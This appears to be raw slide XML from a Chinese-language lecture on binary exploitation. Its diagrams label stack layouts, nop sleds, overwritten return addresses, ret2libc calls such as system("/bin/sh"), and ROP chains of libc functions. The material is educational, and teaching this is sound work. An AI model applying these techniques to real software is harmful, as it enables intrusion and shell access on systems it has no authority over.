            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205AB67C-501F-40F0-8689-F6517E7BED78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631566" y="5424639"/>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31565" y="5687810"/>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31566" y="5929372"/>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14586" y="5492854"/>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56960" y="5492854"/>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56951" y="5492854"/>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56951" y="5755015"/>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CF40EE0-451A-4D1B-8223-CF358B34CEF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10514586" y="5756025"/>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77ED6BB8-F57E-4314-B3FF-D518A5ABE6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10989178" y="3010915"/>
            <a:ext cx="0" cy="27444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7FFE878-B274-44B8-B580-E714AD5E7C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10514588" y="3010915"/>
            <a:ext cx="474578"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3875BE4-F753-48AB-B2FB-D393F8BBEE01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102045" y="2784110"/>
            <a:ext cx="858835" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Libc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="文本框 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C9A344-EC85-4111-8599-9A72C59B0E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102389" y="5545729"/>
            <a:ext cx="858835" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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 </a:t>
            </a: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中的函数获取 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="矩形 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48E567E0-7103-4116-BA78-1A8F51CB38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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29656956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6" name="Shape 1416"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189494" y="22002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**argv</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1417" name="Shape 1417"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189494" y="26098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argc</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1418" name="Shape 1418"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189494" y="3019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 addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1419" name="Shape 1419"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189494" y="3429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a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1420" name="Shape 1420"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189494" y="38386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nop sled</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1421" name="Shape 1421"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1418" idx="3"/>
            <a:endCxn id="1420" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284694" y="3224200"/>
            <a:ext cx="800" cy="1428000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 39687500"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1422" name="Shape 1422"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1814194" y="3065133"/>
            <a:ext cx="0" cy="2397200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1423" name="Shape 1423"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078060" y="3823700"/>
            <a:ext cx="9938400" cy="30400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1424" name="Shape 1424"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4790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25" name="Shape 1425"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="2206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26" name="Shape 1426"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="26156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27" name="Shape 1427"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="30252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28" name="Shape 1428"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="34348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29" name="Shape 1429"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="38444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30" name="Shape 1430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="1796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31" name="Shape 1431"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5226260" y="3025200"/>
            <a:ext cx="1282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a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1432" name="Shape 1432"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1431" idx="3"/>
            <a:endCxn id="1427" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6509060" y="3230000"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1433" name="Shape 1433"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1431" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4641060" y="3230000"/>
            <a:ext cx="585200" cy="17200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1434" name="Shape 1434"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9411527" y="1821133"/>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35" name="Shape 1435"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="95099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36" name="Shape 1436"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9509960" y="1739333"/>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37" name="Shape 1437"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255460" y="1990333"/>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address</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1438" name="Shape 1438"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255460" y="5061600"/>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address</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="矩形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE79ABDA-DE19-4990-B8CC-CA9DDE83839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4" name="Shape 1444"/>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45" name="Shape 1445"/>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46" name="Shape 1446"/>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system</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1447" name="Shape 1447"/>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8" name="Shape 1448"/>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9" name="Shape 1449"/>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50" name="Shape 1450"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5671600" y="35180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51" name="Shape 1451"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="37228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52" name="Shape 1452"/>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53" name="Shape 1453"/>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54" name="Shape 1454"/>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55" name="Shape 1455"/>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0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system:</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...(execute command)</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1456" name="Shape 1456"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="288252" y="3182797"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1457" name="Shape 145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600" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1458" name="Shape 145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59" name="Shape 1459"/>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stack overflow:</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0E703D33-266A-4DA4-8429-64485256C9C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5" name="Shape 1465"/>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66" name="Shape 1466"/>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67" name="Shape 1467"/>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68" name="Shape 1468"/>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padding</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469" name="Shape 1469"/>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70" name="Shape 1470"/>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71" name="Shape 1471"/>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472" name="Shape 1472"/>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73" name="Shape 1473"/>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74" name="Shape 1474"/>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75" name="Shape 1475"/>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76" name="Shape 1476"/>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77" name="Shape 1477"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="288252" y="4254879"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1478" name="Shape 147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479" name="Shape 1479"/>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480" name="Shape 1480"/>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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</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9A357E0F-0C05-4298-9FE4-18E71B75D7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6" name="Shape 1486"/>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487" name="Shape 1487"/>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488" name="Shape 1488"/>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89" name="Shape 1489"/>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0" name="Shape 1490"/>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1" name="Shape 1491"/>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92" name="Shape 1492"/>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93" name="Shape 1493"/>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94" name="Shape 1494"/>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95" name="Shape 1495"/>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96" name="Shape 1496"/>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highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system("/bin/sh")</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97" name="Shape 1497"/>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push ebp</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...(execute command)</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98" name="Shape 1498"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="288252" y="5240535"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1499" name="Shape 149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00" name="Shape 1500"/>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01" name="Shape 1501"/>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02" name="Shape 1502"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5018800" y="24964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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1503" name="Shape 1503"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="27004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22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56E734AB-BC17-4D89-93C2-FEE1F58FA7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9" name="Shape 1509"/>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510" name="Shape 1510"/>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511" name="Shape 1511"/>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512" name="Shape 1512"/>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3" name="Shape 1513"/>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4" name="Shape 1514"/>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515" name="Shape 1515"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5671600" y="27052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516" name="Shape 1516"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="29100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517" name="Shape 1517"/>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518" name="Shape 1518"/>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519" name="Shape 1519"/>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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>exit(0)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1520" name="Shape 1520"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="288252" y="2192535"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1521" name="Shape 152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22" name="Shape 1522"/>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23" name="Shape 1523"/>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exit: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24" name="Shape 1524"/>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ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1525" name="Shape 1525"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="22940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1526" name="Shape 1526"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5018800" y="20900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sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C986233-B83D-40B0-83BF-B05575D8FBB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599CD0-8759-42A7-8550-5B0375F44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470769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{268D2B68-29D0-47D9-A35F-5B70048C6E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="420880" y="5982236"/>
            <a:ext cx="1999265"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ELF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AA57B2A-F19A-4C54-839D-F7DD6596C1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9853277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Shape 1709"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="730250"/>
            <a:ext cx="4579938" cy="763588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>连续调用多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1710" name="Shape 1710"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383600" y="44935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read(int fd, char *buf, int len);</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1711" name="Shape 1711"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="22347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2" name="Shape 1712"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="26443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fd=1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
